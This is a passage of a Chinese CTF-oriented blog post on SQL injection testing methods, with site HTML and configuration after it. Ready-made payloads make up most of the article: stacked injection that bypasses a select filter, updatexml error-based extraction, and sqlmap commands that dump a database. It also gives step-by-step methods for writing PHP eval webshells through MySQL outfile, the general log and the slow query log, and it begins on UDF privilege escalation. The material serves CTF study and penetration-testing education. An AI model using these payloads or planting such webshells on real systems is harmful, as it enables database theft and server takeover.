<h6 id="sql预处理"><a href="#sql预处理" class="headerlink" title="sql预处理"></a>sql预处理</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">堆叠执行命令</span><br><span class="line">1&#x27;;Set @sql=concat(&quot;s&quot;,&quot;elect flag from `1919810931114514`&quot;);PREPARE sqla from @sql;EXECUTE sqla; #</span><br><span class="line">#可以绕过select的过滤</span><br></pre></td></tr></table></figure>

<h6 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">?inject=&#x27;;show tables --+</span><br><span class="line">?inject=&#x27;;show columns from  `1919810931114514`--+</span><br><span class="line">?inject=&#x27;;show columns from  `words`--+</span><br><span class="line"></span><br><span class="line">&#x27;;rename table words to words123;rename table `1919810931114514` to words;alter table words change flag id varchar(100);--+</span><br><span class="line">#rename命令用于修改表名。</span><br><span class="line">#rename命令格式：rename table 原表名 to 新表名;</span><br><span class="line">#alert修改字段名及字段属性值</span><br><span class="line">alert table 表名 change 旧字段名 新字段名 新字段属性;</span><br></pre></td></tr></table></figure>

<h5 id="sqlmap简单的使用"><a href="#sqlmap简单的使用" class="headerlink" title="sqlmap简单的使用"></a>sqlmap简单的使用</h5><p>题目：nsscft [SWPUCTF 2021 新生赛]error</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240413121633.png" alt="20240413121633"></p>
<p>直接就给了sql的语句</p>
<p>sqlmap一把梭<br>先获取数据库名</p>
<p><code>sqlmap -u &#39;http://node4.anna.nssctf.cn:28070/?id=1&#39; --batch --dbs</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240413122708.png" alt="20240413122708"></p>
<p>再获取表名<br><code>sqlmap -u &#39;http://node4.anna.nssctf.cn:28070/?id=1&#39; --batch -D test --tables </code></p>
<p>在获取列名<br><code>sqlmap -u &#39;http://node4.anna.nssctf.cn:28070/?id=1&#39; --batch -D test_db -T test_tb -column</code></p>
<p>最后获取字段<br><code>sqlmap -u &#39;http://node4.anna.nssctf.cn:28070/?id=1&#39; --batch -D test_db -T test_tb -C flag --dump</code><br><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240413124214.png" alt="20240413124214"></p>
<p>当然也可以自己去尝试报错注入。</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240413122914.png" alt="20240413122914"></p>
<p>但是这里的报错有字符限制，所以我们使用substring来对字段进行截取</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240413124003.png" alt="20240413124003"></p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,(select substring((select group_concat(id,&#x27;~&#x27;,flag) from test_tb),20))),1)--+</span><br><span class="line"></span><br><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,(select group_concat(id,&#x27;~&#x27;,flag) from test_tb)),1)--+</span><br></pre></td></tr></table></figure>

<h3 id="mysql-渗透"><a href="#mysql-渗透" class="headerlink" title="mysql 渗透"></a>mysql 渗透</h3><h4 id="mysql写入webshell"><a href="#mysql写入webshell" class="headerlink" title="mysql写入webshell"></a>mysql写入webshell</h4><ul>
<li>通过outfile写入shell</li>
</ul>
<p>利用条件</p>
<p>1.root权限<br>2.网站的绝对路径且具有写入权限，能够使用into outfile和into dumpfile来进行写入。</p>
<p><code>select 1,&quot;&lt;?php eval($_REQUEST[8])?&gt;&quot; into outfile &#39;C:/phpStudy/WWW/4448.php&#39;</code></p>
<ul>
<li>将shell写入表中</li>
</ul>
<p>1.root权限<br>2.网站的绝对路径且具有写入权限。</p>
<p>先运行,生成表<br><code>select 1,insert into &#39;sxss&#39;(&#39;comment&#39;) values (&#39;&lt;?php  @eval($_POST[1]);?&gt;&#39;);</code></p>
<p>查询该数据表，将结果导出文件<br><code>select comment from sxss into outfile &#39;C:/phpStudy/WWW/4449.php&#39;;</code></p>
<ul>
<li>开启全局日志写入shell</li>
</ul>
<p>1.root权限<br>2.网站的绝对路径且具有写入权限。</p>
<p>查看全局日志配置 <code>show variables like &#39;%general%&#39;;</code><br>开启全局配置 <code>set global general_log = on;</code><br>将日志文件设置成服务器下的木马文件 <code>set global general_log_file = &#39;C:/phpStudy/WWW/4449.php&#39;</code><br>然后执行sql语句，mysql会将我没执行的语句记录到日志文件(上一步修改后的文件)中 <code>select &#39;&lt;?php  @eval($_POST[1]);?&gt;&#39;;</code></p>
<ul>
<li>慢查询日志写入shell</li>
</ul>
<p>在实际写webshell的时候，我们经常会遭受到secure_file_priv的阻拦，secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用，其参数值有以下三种：</p>
<p>1、NULL：表示不允许导入导出<br>2、目录地址，如&#x2F;tmp&#x2F;：表示只能对指定目录进行导入导出，如&#x2F;tmp&#x2F;<br>3、空，即没有具体值：表示不对导入导出做限制</p>
<p>可使用如下命令来查看secure_file_priv的值：<br>在高版本的mysql中默认为NULL，就是不让导入和导出</p>
<p>解决办法：<br>在Windows下可在my.ini的[mysqld]里面，添加secure_file_priv&#x3D;<br>在linux下可在&#x2F;etc&#x2F;my.cnf的[mysqld]里面，添加secure_file_priv&#x3D;<br>使用慢查询日志绕过此限制</p>
<p>利用条件：<br>1、root权限<br>2、网站的绝对路径且具有写入权限执行如下语句写入shell：</p>
<p>查看慢查询日志开启情况 <code>show variables like &#39;%slow_query_log%&#39;;</code><br>开启慢查询日志 <code>set global slow_query_log=1;</code><br>修改日志文件存储的绝对路径 <code>set global slow_query_log_file=&#39;C:/phpStudy/WWW/4449.php&#39;;</code><br>向日志文件中写入shellselect <code>&#39;&lt;?php @eval($_POST[1]);?&gt;&#39; or sleep(11);</code><br>使用慢查询日志时，只有当查询时间超过系统时间(默认为10秒)时才会记录在日志中，使用如下语句可查看系统时间：<code>show global variables like &#39;%long_query_time%&#39;;</code></p>
<h4 id="mysql命令执行"><a href="#mysql命令执行" class="headerlink" title="mysql命令执行"></a>mysql命令执行</h4><p>目前还没有遇上可以的<br>网上说直接使用<code>system ls;</code></p>
<h4 id="MYSQL-UDF-提权"><a href="#MYSQL-UDF-提权" class="headerlink" title="MYSQL UDF 提权"></a>MYSQL UDF 提权</h4><h5 id="UDF定义"><a href="#UDF定义" class="headerlink" title="UDF定义"></a>UDF定义</h5><p>那么什么是 UDF ？ 全称是 User defined function(用户自定义函数)，一听这个名字就知道我的基础权限要求还是很高的，要求数据库 root 权限<br>当我们有读取和写入权限以后，我们就可以尝试使用 udf 提权的方法，从数据库的 root 权限提升到 系统的管理员权限</p>
<h5 id="UDF位置"><a href="#UDF位置" class="headerlink" title="UDF位置"></a>UDF位置</h5><p>因为叫 UDF 于是我们能编写自己的 DLL 然后让 mysql 调用，实现我们自定义的命令</p>
<p>从MySQL 5.0.67开始，UDF库必须包含在plugin文件夹中，可以使用‘@@plugin_dir’全局变量找到它。这个变量可以在mysql.ini文件中看到和编辑。</p>
<p><code>select @@plugin_dir;</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240520172418.png" alt="20240520172418"></p>
<p><code>show variables like &#39;plugin%&#39;;</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240520172512.png" alt="20240520172512"></p>
<p>从MySQL 5.0.67开始，文件必须位于plugin目录中。该目录取决于plugin_dir系统变量的值。如果plugin_dir的值为空，则参照5.0.67之前即文件必须位于系统动态链接器的搜索目录中。</p>

                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="/image/sidebar/-f128e7dd768b5.jpg" alt="懒羊羊">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>懒羊羊
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/2022/10/09/sql%E6%B3%A8%E5%85%A5%E6%B5%8B%E8%AF%95%E6%96%B9%E6%B3%95/" target="_blank">sql注入测试方法.md</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>简单地活着, 肆意又精彩.
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                
                    <div class="tag">
                        标签：
                        
                            <a href="/tags/ctfknowledge/">ctfknowledge</a>
                        
                    </div>
                
                <div class="article-prev-next">
                    
                        <a href="/2022/10/11/rce%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/" class="prev-prefix">« </a> 上一篇：    <a href="/2022/10/11/rce%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/" title="发布于 2022-10-11 02:57">rce绕过总结</a>
                        <br>
                    
                    
                        <a href="/2022/09/25/grafano%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/" class="next-prefix">» </a> 下一篇：    <a href="/2022/09/25/grafano%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/" title="发布于 2022-09-25 04:02">Grafano框架漏洞总结</a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>

        </div>
    
</div>
    <div id="footer"></div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>简单地活着，肆意而又精彩！</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="/image/sidebar/-f128e7dd768b5.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user"><span>懒羊羊</span></div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=""><a href="/archive" class="" target="_self"><span class="iconfont icon-calendar-fill"></span>归档</a></li>
                    
                        <li class=""><a href="/donate" class="" target="_self"><span class="iconfont icon-heart-fill"></span>赞赏</a></li>
                    
                        <li class=""><a href="/about" class="" target="_self"><span class="iconfont icon-about-fill"></span>关于</a></li>
                    
                        <li class=""><a href="/atom.xml" class="" target="_blank"><span class="iconfont icon-rss"></span>订阅</a></li>
                    
                        <li class=""><a href="javascript:;" class="search" target="_self"><span class="iconfont icon-search-menu"></span>搜索</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="知乎" href="https://zhihu.com/people/worstone-29" class="" target="_blank" data=""><span class="iconfont icon-zhihu"></span></a>
                
                    <a name="微博" href="https://weibo.com/u/5749847477" class="" target="_blank" data=""><span class="iconfont icon-weibo"></span></a>
                
                    <a name="QQ" href="javascript:;" class="image" target="_self" data="/image/sidebar/qq.png"><span class="iconfont icon-qq"></span></a>
                
                    <a name="微信" href="javascript:;" class="" target="_self" data=""><span class="iconfont icon-wechat"></span></a>
                
                    <a name="GitHub" href="https://github.com/first19326" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>

    
        <link type="text/css" rel="stylesheet" href="/css/APlayer.css">
        <script type="text/javascript" src="/js/APlayer.min.js"></script>
        <script type="text/javascript" src="/js/Meting.min.js"></script>
        <meting-js id="3778678" lrcshow="false" server="netease" type="playlist" fixed="true" autoplay="false" loop="all" order="random" preload="auto" volume="0.67" mutex="true"></meting-js>
    
    
    <div class="wrap-right">
        <div class="setting">
            <div class="iconbox favorites" switch="false">
                <span class="iconfont icon-favorites"></span>
                <span class="icontext">关注</span>
            </div>
            <div class="iconbox mode">
                <div class="light">
                    <span class="iconfont icon-daymode"></span>
                    <span class="icontext">浅色模式</span>
                </div>
                <div class="dark">
                    <span class="iconfont icon-nightmode-fill"></span>
                    <span class="icontext">深色模式</span>
                </div>
            </div>
            <a href="javascript:;" target="_self" class="search">
                <div class="iconbox">
                    <span class="iconfont icon-search-menu"></span>
                    <span class="icontext">搜索</span>
                </div>
            </a>
            <div class="iconbox bottom">
                <div style="display: inline-block; transform: rotate(180deg);">
                    <span class="iconfont icon-top"></span>
                </div>
                <span class="icontext">跳至底部</span>
            </div>
        </div>
        <div class="iconbox set">
            <div style="display: inline-block;">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="iconbox top">
            <span class="iconfont icon-top"></span>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "Daylovef",
        GitHubRepositories : "Hexo-LiveForCode",

        User             : "懒羊羊",
        UserAvatar       : "/image/sidebar/-f128e7dd768b5.jpg",
        WebsiteStartDate : "2020-01-01",

        WebsiteTitleBlur         : "(◍´꒳`◍) FYL is my girlfriend",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "(*´∇｀*) 欢迎回来!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : "/image/website/logo.png",

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#77B6FF",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/51c6d5c3154ea2f0.jpg",
            
                "/image/header/home.jpg",
            
                "/image/header/home.jpeg",
            
        ],
        HomeBannerText  : "",

        ArticleHeaderImage : [
            
                "/image/header/article.jpg",
            
        ],

        OtherBannerText : "",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "简单地活着，肆意而又精彩！",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "归档",
                    icon   : "icon-calendar-fill",
                    href   : "/archive",
                    type   : "archive",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "赞赏",
                    icon   : "icon-heart-fill",
                    href   : "/donate",
                    type   : "donate",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "关于",
                    icon   : "icon-about-fill",
                    href   : "/about",
                    type   : "about",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "订阅",
                    icon   : "icon-rss",
                    href   : "/atom.xml",
                    type   : "",
                    class  : "",
                    target : "_blank"
                },
            
                {
                    name   : "搜索",
                    icon   : "icon-search-menu",
                    href   : "javascript:;",
                    type   : "",
                    class  : "search",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "知乎",
                        icon   : "icon-zhihu",
                        href   : "https://zhihu.com/people/worstone-29",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "微博",
                        icon   : "icon-weibo",
                        href   : "https://weibo.com/u/5749847477",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "QQ",
                        icon   : "icon-qq",
                        href   : "javascript:;",
                        class  : "image",
                        target : "_self",
                        image  : "/image/sidebar/qq.png"
                    },
                
                    {
                        name   : "微信",
                        icon   : "icon-wechat",
                        href   : "javascript:;",
                        class  : "",
                        target : "_self",
                        image  : ""
                    },
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/first19326",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : "<div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2022 WorstOne. All Rights Reserved.</div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            paypal  : "",
            bitcoin : "",
            alipay  : "/image/donate/alipay.png",
            wechat  : "/image/donate/wechat.png"
        },

        Search : {
            applicationID : "010C3EANT8",
            apiKey        : "c7abab9f11b79102b9aff7fe6d41447d",
            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Valine : {
            switch         : true,
            el             : ".comments-content",
            appId          : "srhKtvWPQTWYKh3qX8G8M7v0-gzGzoHsz",
            appKey         : "8uVSP1q6UlALVC5igYfIfv2h",
            serverURLs     : "",
            placeholder    : "你是我一生只会遇见一次的惊喜...",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Music : {
            type : "Meting"
        },
        APlayer : {
            container : ".aplayer",
            fixed     : true,
            autoplay  : false,
            loop      : "all",
            order     : "random",
            preload   : "auto",
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : "Endless Tears",
                        artist : "CLIFF EDGE",
                        cover  : "/music/cover/Endless Tears.jpg",
                        url    : "/music/song/Endless Tears.mp3",
                        lrc    : "/music/lrc/Endless Tears.lrc"
                    },
                
            ]
        },
        Meting : {
            id       : "3778678", 
            lrcshow  : false, 
            server   : "netease", 
            type     : "playlist", 
            fixed    : true, 
            autoplay : false, 
            loop     : "all", 
            order    : "random", 
            preload  : "auto", 
            volume   : 0.67, 
            mutex    : true
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "/css/APlayer.css",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css"
        },

        Script: {
            aplayer          : "/js/APlayer.min.js",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js"
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "简单地活着, 肆意又精彩."
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
</body>
</html>